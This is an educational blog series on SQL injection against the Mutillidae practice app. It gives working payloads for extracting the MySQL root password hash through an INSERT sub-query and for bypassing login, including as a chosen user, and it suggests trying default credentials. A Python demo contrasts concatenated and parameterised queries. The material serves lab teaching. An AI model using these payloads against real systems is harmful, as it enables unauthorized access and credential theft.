Bitcrack Educational Blog: Educational Cyber Security Articles for the Community (Dimitri, http://www.blogger.com/profile/12282994399370434479)

Mutillidae OWASP Top 10: A1 Injection - SQLi Insert Injection (published 2016-11-02)
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: "trebuchet ms" , sans-serif;">Head over to:</span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: "trebuchet ms" , sans-serif; line-height: 107%;">OWASP Top 10 > A1
Injection > SQLi - Insert Injection > Register </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="line-height: 107%;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">This page is vulnerable to two types of attack: an SQL insert injection attack and a cross-site scripting </span><span style="font-family: "trebuchet ms" , sans-serif;">(XSS)</span><span style="font-family: "trebuchet ms" , sans-serif;"> attack. We will look at the latter in a coming article. </span></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-HmICChZSPgM/WBoDXdoso5I/AAAAAAAACv0/aBZ4vZd6U0su3neFtoU1pMiC217tKy6nACEw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://1.bp.blogspot.com/-HmICChZSPgM/WBoDXdoso5I/AAAAAAAACv0/aBZ4vZd6U0su3neFtoU1pMiC217tKy6nACEw/s400/1.PNG" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;">
<span style="font-family: "trebuchet ms" , sans-serif;">As usual, let's trigger an error by entering an apostrophe ( ' ).</span></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-OPfe5DgKto4/WBoDXpWcM_I/AAAAAAAACv8/Cnc7TOZWIWYCdyA08qSQN_54ddZE-dzwwCLcB/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://3.bp.blogspot.com/-OPfe5DgKto4/WBoDXpWcM_I/AAAAAAAACv8/Cnc7TOZWIWYCdyA08qSQN_54ddZE-dzwwCLcB/s400/2.PNG" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<span style="font-family: "trebuchet ms" , sans-serif;">This looks like a very simple SQL INSERT query. The page inserts the username, password and mysignature values into the accounts table, the same table from which we dumped data <a href="http://edublog.bitcrack.net/2016/10/mutillidae-owasp-top-10-a1-injection.html" target="_blank">here</a>. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">The idea behind this type of attack is to embed a sub-query within the main INSERT query. Its result is then shown wherever the page echoes the stored record back: in the message box or text field the page pops up to confirm a successful entry, or in any other place that displays the related information from the database. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span><span style="font-family: "trebuchet ms" , sans-serif;">The most basic example of such a place is the green text box above the form that tells us the account was created:</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-0X9DO0xLPE8/WBoDX8E-4pI/AAAAAAAACwA/59bjnpMRbyEDUYwW_HzvrM6C8nkhxSXIwCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="https://4.bp.blogspot.com/-0X9DO0xLPE8/WBoDX8E-4pI/AAAAAAAACwA/59bjnpMRbyEDUYwW_HzvrM6C8nkhxSXIwCEw/s400/3.PNG" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">We can also retrieve the user information from the user-info.php page, where the username, password and signature are shown back once the correct credentials are supplied. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">The green text box cannot be used to retrieve our sub-query results because it only displays the username field, which gives us little room to probe: the first quote ( ' ) around the input value is already part of the insert query.</span></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-uhxueI7nZVU/WBoDXTnrPCI/AAAAAAAACv4/oPM2Gcl6LP4nwFjccCVaZL8wPZRe46j4ACEw/s1600/2%2B-%2BCopy.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="https://3.bp.blogspot.com/-uhxueI7nZVU/WBoDXTnrPCI/AAAAAAAACv4/oPM2Gcl6LP4nwFjccCVaZL8wPZRe46j4ACEw/s400/2%2B-%2BCopy.PNG" width="400" /></a></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">The password field cannot be used for the sub-query either, because we need a known password to retrieve the user info from the user-info page. </span></li>
</ul>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">That leaves only the signature field. This is the ideal field because it is shown back to us when we submit valid credentials on the user-info.php page. </span></li>
</ul>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;">Let's try to retrieve the password for the <b>mysql "root" user</b>.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Currently, the query looks like this:</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">INSERT INTO accounts (username, password, mysignature) VALUES (''','','')</span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: x-small;">Note: the three quotes after VALUES are there because we entered an apostrophe to create the error.</span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: trebuchet ms, sans-serif;">Sub-query to retrieve the MySQL root user's password:</span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">SELECT password FROM mysql.user WHERE user="root"</span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: x-small;">Our sub-query to retrieve the MySQL root user's password</span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Sub-query placed inside the main query:</span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">INSERT INTO accounts (username, password, mysignature) VALUES ('x','x',(select password from mysql.user where user="root")) -- </span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Break down:</span></div>
<div style="text-align: left;">
</div>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">VALUES ('x','x', - this supplies the username and password. </span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">followed by the sub-query, which supplies the mysignature value</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">) -- - closes the statement and comments out everything after it. </span></li>
</ul>
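As an added example (not part of the original post and not Mutillidae's own code), the following Python script reproduces the register page's INSERT in SQLite. It uses a constructed accounts table and a mock mysql.user table holding a placeholder value, so the sub-query target exists offline. It shows the malicious string landing in the signature column when the query is built by string concatenation, and the same string being stored as harmless text by a parameterised INSERT. The table contents, the placeholder hash and the function names are assumptions.

```python
import sqlite3

# Constructed stand-ins: an "accounts" table like the one on the register page,
# and a mock mysql.user table created in an attached in-memory schema so that
# the page's sub-query target exists offline. Not real Mutillidae/MySQL data.
SAMPLE_ROOT_HASH = "SAMPLE_ROOT_HASH_NOT_REAL"  # constructed placeholder, not a real hash


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("ATTACH DATABASE ':memory:' AS mysql")
    con.execute("CREATE TABLE accounts (username TEXT, password TEXT, mysignature TEXT)")
    con.execute("CREATE TABLE mysql.user (user TEXT, password TEXT)")
    con.execute("INSERT INTO mysql.user VALUES ('root', ?)", (SAMPLE_ROOT_HASH,))
    return con


def register_vulnerable(con, username, password, signature):
    # Builds the INSERT by string concatenation, the pattern the register page's
    # error message reveals. A quote in the input ends the literal and whatever
    # follows is parsed as SQL, so a sub-query can supply the mysignature value.
    sql = ("INSERT INTO accounts (username, password, mysignature) "
           "VALUES ('%s','%s','%s')" % (username, password, signature))
    con.execute(sql)


def register_safe(con, username, password, signature):
    # Parameterised INSERT: the three values travel separately from the SQL
    # text, so the payload is stored as an ordinary string and never parsed.
    con.execute("INSERT INTO accounts (username, password, mysignature) VALUES (?, ?, ?)",
                (username, password, signature))


def user_info(con, username, password):
    # What user-info.php echoes back after a valid login, including the signature.
    return con.execute(
        "SELECT username, password, mysignature FROM accounts WHERE username=? AND password=?",
        (username, password)).fetchone()


# The page's malicious string as typed into the username box. Single quotes are
# used around root because SQLite tries double-quoted strings as identifiers first.
PAYLOAD = "x','x',(select password from mysql.user where user='root')) -- "


def demo_vulnerable():
    con = make_db()
    register_vulnerable(con, PAYLOAD, "", "")
    # Account x/x now exists and its signature is the value pulled from mysql.user.
    return user_info(con, "x", "x")


def demo_safe():
    con = make_db()
    register_safe(con, PAYLOAD, "", "")
    # No account x/x exists; the whole payload is simply the stored username.
    stored_username = con.execute("SELECT username FROM accounts").fetchone()[0]
    return user_info(con, "x", "x"), stored_username


if __name__ == "__main__":
    print("concatenated INSERT:", demo_vulnerable())
    print("parameterised INSERT:", demo_safe())
```

The leak is second-order: nothing is visible at registration time, and the stolen value only appears later, on the user-info page, which is why scanning the registration response alone would not reveal it. The parameterised version is the fix; note that SQLite accepts a bare `--` comment, whereas MySQL needs the space after it that the post's payload includes.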
<div style="text-align: center;">
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>Our malicious string</i></span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
</div>
<div style="text-align: center;">
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">x','x',(select password from mysql.user where user="root")) --</span></div>
</div>
<div>
<div style="text-align: left;">
<span style="text-align: center;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span></div>
</div>
<div style="text-align: center;">
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Attack: </span><span style="font-family: "trebuchet ms" , sans-serif;">enter the malicious string into the username text box</span></div>
</div>
</div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-BiUO-1-HeIk/WBoDXzQHCfI/AAAAAAAACwE/H9hy2Y9WcocT1hvdUQkxSmBpFNrry1nIgCEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://1.bp.blogspot.com/-BiUO-1-HeIk/WBoDXzQHCfI/AAAAAAAACwE/H9hy2Y9WcocT1hvdUQkxSmBpFNrry1nIgCEw/s400/4.PNG" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Confirm successful entry</span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<br /></div>
</div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-DYZd46BATzk/WBoDYGVkIrI/AAAAAAAACwI/3HDN4-UXlikxfsKlfzgSXCmaNGNlmNPMQCEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="36" src="https://4.bp.blogspot.com/-DYZd46BATzk/WBoDYGVkIrI/AAAAAAAACwI/3HDN4-UXlikxfsKlfzgSXCmaNGNlmNPMQCEw/s400/5.PNG" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
</div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Head over to:</span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">OWASP Top 10 - A1 Injection - SQLi Extract Data - User Info</span></div>
</div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Log in with your newly created account, username=x and password=x</span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
</div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-S1iq2lWkXmI/WBoDYfXUwyI/AAAAAAAACwM/Z5MHaWa4ZuQMTy6tl1Rq1Vsc04F1A9F_QCEw/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="73" src="https://1.bp.blogspot.com/-S1iq2lWkXmI/WBoDYfXUwyI/AAAAAAAACwM/Z5MHaWa4ZuQMTy6tl1Rq1Vsc04F1A9F_QCEw/s400/6.PNG" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">The signature is an MD5 hash of the root user's password. </span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">To use the password hash, you first need to crack it to recover the clear-text password. </span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Please note: the MySQL root user's password is very different from the passwords we dumped earlier from this page. The root user's password unlocks many more doors for you.</span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</span></div>
</div>
</div>
Posted by Jayesh (http://www.blogger.com/profile/00209381489830183839)

Mutillidae OWASP Top 10: A1 Injection - SQLi Bypass Authentication (published 2016-10-17)
<span style="font-family: Trebuchet MS, sans-serif;">We looked at a simple data extraction technique in our <a href="http://edublog.bitcrack.net/2016/10/mutillidae-owasp-top-10-a1-injection.html" target="_blank">previous article</a>. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Now let's look at a simple authentication bypass technique.</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Head over to:</span><br />
<span style="font-family: Trebuchet MS, sans-serif;">OWASP Top 10 > A1 Injection > SQLi - Bypass Authentication > Login</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">The page looks very similar to the one in the previous article, except that this page logs you in to the system instead of displaying information. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Follow the previous article to cause an error with an apostrophe ( ' ). You will notice that the SQL query is the same one we have seen before. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-s206BJXUaBQ/WASOJtsvarI/AAAAAAAACtY/-WAlKjH4CAY9aCOGpk9boaATthciTjefQCEw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://3.bp.blogspot.com/-s206BJXUaBQ/WASOJtsvarI/AAAAAAAACtY/-WAlKjH4CAY9aCOGpk9boaATthciTjefQCEw/s400/1.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">This means we can still use our previous string ( ' OR 1=1 -- ) here. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Enter the string in the name field, </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Pz9QbXrkhjE/WASOJoM_FVI/AAAAAAAACtQ/wZnC9dsoJCIMiYGswLyQRfFZ88khu1WQgCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="https://1.bp.blogspot.com/-Pz9QbXrkhjE/WASOJoM_FVI/AAAAAAAACtQ/wZnC9dsoJCIMiYGswLyQRfFZ88khu1WQgCEw/s400/2.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">and voilà! You're logged in as admin. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">You are logged in as admin because that is the first record in the accounts table. In the real world that may not be the case, so we need to narrow our attack a little to log in as a user of our choosing.</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Let's try to log in as "john". We know from our previous hack that he is the third user in the accounts table. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">The technique is still simple and similar, with one slight change. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">Logging in as a specific user</span></h3>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">We know that the statement below is always TRUE and that it logs us in as the first user in the accounts table, who is admin. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div style="text-align: center;">
<span style="font-family: Trebuchet MS, sans-serif;">SELECT * FROM accounts WHERE username= ' OR 1=1 -- </span></div>
<div style="text-align: center;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"><i>TRUE Statement</i></span></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">We can modify this with one more operator. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">From the statement we can see that users are matched on the "username" column, and that everything after the OR operator must be TRUE for the bypass to work. We can add an "AND" operator that specifies the username. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div style="text-align: center;">
<span style="font-family: Trebuchet MS, sans-serif;">SELECT * FROM accounts WHERE username=' OR (1=1 AND username = 'john') -- </span></div>
<div style="text-align: center;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"><i>Still a TRUE statement</i></span></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Breakdown:</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /><ul>
<li>The first apostrophe ( ' ) makes the username input blank. The statement is currently false.</li>
<li>But the "OR" operator tells the statement that if anything after it is true, then the whole statement becomes true. </li>
<li>"1=1" is a true condition, just like 2 = 2 or 100 = 100. </li>
<li><a href="http://www.w3schools.com/sql/sql_and_or.asp" target="_blank">The "AND" operator</a> lets us add another condition. Follow the <a href="http://dev.mysql.com/doc/refman/5.7/en/logical-operators.html" target="_blank">link for more info</a>. </li>
<li>"username = 'john'" is true because, from our <a href="http://edublog.bitcrack.net/2016/10/mutillidae-owasp-top-10-a1-injection.html" target="_blank">extract data</a> tutorial, there is a "john" user account among the 16 accounts displayed. </li>
<li>With both conditions around the "AND" operator being true, the whole statement becomes TRUE. </li>
<li>The "--" tells the query to ignore everything after it. </li>
</ul>
</span><span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Right-click the name field and click Inspect Element. Here we change the "maxlength" attribute to 50 so that our new string fits.</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-l135kxj6euk/WASOJjqKF3I/AAAAAAAACtU/hX8mAv4bk8wMPrprqPbn2Tm0M7CJ-4oUwCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://2.bp.blogspot.com/-l135kxj6euk/WASOJjqKF3I/AAAAAAAACtU/hX8mAv4bk8wMPrprqPbn2Tm0M7CJ-4oUwCEw/s400/3.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">And enter the new string on the name field. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-x4dE2qsePpQ/WASOKDsIENI/AAAAAAAACtg/JPu4DlIbbi8JlvURH91LUN33mhyTmcWGQCEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="https://2.bp.blogspot.com/-x4dE2qsePpQ/WASOKDsIENI/AAAAAAAACtg/JPu4DlIbbi8JlvURH91LUN33mhyTmcWGQCEw/s400/4.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">You've logged in as John! :)</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-QQE0n6UfhxE/WASOKCBsEuI/AAAAAAAACtc/0GlK7Uif4g0G4co3CoYYcMLXTSrAHJuHgCEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://4.bp.blogspot.com/-QQE0n6UfhxE/WASOKCBsEuI/AAAAAAAACtc/0GlK7Uif4g0G4co3CoYYcMLXTSrAHJuHgCEw/s400/5.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">If you got an error, it means you didn't leave a space after your "--". Make sure to leave a single space character after it. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span>
Posted by Jayesh (http://www.blogger.com/profile/00209381489830183839)

Mutillidae OWASP Top 10: A1 Injection - SQLi Extract Data (published 2016-10-14, updated 2016-10-17)
<span style="font-family: "trebuchet ms" , sans-serif;">We can start web penetration testing on <a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metasploitable 2</a> by accessing <a href="https://sourceforge.net/projects/mutillidae/" target="_blank">Mutillidae</a> from the web browser of the Kali attacker machine.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the address: <<Metasploitable 2 IP address>>/mutillidae</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Mutillidae comes with all of the <a href="https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet" target="_blank">OWASP top 10 vulnerabilities</a> found on real websites. You can safely practise common web vulnerabilities on Mutillidae to build a strong foundation in basic web attacks. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">We will exploit the web vulnerabilities in a sequence starting with A1.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Browse over to OWASP Top 10 > A1 - Injection > SQLi - Extract Data > User Info page. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://www.owasp.org/index.php/SQL_Injection" target="_blank">SQLi</a> is a type of web attack in which an attacker inserts an SQL query that talks to the application's database and, in favorable cases, can reveal or retrieve the entire database. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Let's take a look at the most basic SQL injection technique.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">If you have browsed over to the user info page, it should look like this:</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-EdWlJ_-8dog/WADgkgTi0RI/AAAAAAAACsw/D8dbOVzP0xogZ9KoAdXs_JwGLZKhIroKgCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" height="227" src="https://2.bp.blogspot.com/-EdWlJ_-8dog/WADgkgTi0RI/AAAAAAAACsw/D8dbOVzP0xogZ9KoAdXs_JwGLZKhIroKgCLcB/s400/1.PNG" width="400" /></span></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">A simple form with a username and password field. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Trial and Error with Default Credentials</span></h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">When you see such a form, always try the default credentials first. At times you can succeed with default credentials because they are often not changed; for example, username: Admin and password: Admin are common defaults. There are tons of default passwords published online for you to try logging in with.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Great lists of default passwords can be found at <a href="http://www.phenoelit.org/dpl/dpl.html" target="_blank">phenoelit.org</a> and <a href="http://www.defaultpassword.com/" target="_blank">defaultpassword.com</a>.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Manipulating SQL Query Strings</span></h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">First we need to know what the query looks like in order to manipulate it. Intentionally causing errors on the page can often reveal that information. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">In the "name" field enter an apostrophe ( ' ). This will cause an error and give you output looking like this:</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-2mwl-WJWSQM/WADgkpEkG3I/AAAAAAAACs0/P_YgLdfJlQkOliYIvnnLoo8CZSaUPWFHQCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" height="246" src="https://2.bp.blogspot.com/-2mwl-WJWSQM/WADgkpEkG3I/AAAAAAAACs0/P_YgLdfJlQkOliYIvnnLoo8CZSaUPWFHQCEw/s400/2.PNG" width="400" /></span></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">From the error table we can clearly see the SQL query that is used. The query needs a username AND a password before it will show any details. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">SELECT * FROM accounts WHERE username=''' AND password=''</span></div>
<div style="text-align: center;">
<i><span style="font-family: "trebuchet ms" , sans-serif; font-size: x-small;">This statement will only be true if you know both the username and password</span></i></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">However, since we don't have a username and password, we can simply use a comment ( -- ) and the "OR" <a href="http://dev.mysql.com/doc/refman/5.7/en/non-typed-operators.html" target="_blank">SQL operator</a> to make the statement TRUE without knowing the username and password. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">SELECT * FROM accounts WHERE username='' OR 1=1 -- ' AND password=''</span></div>
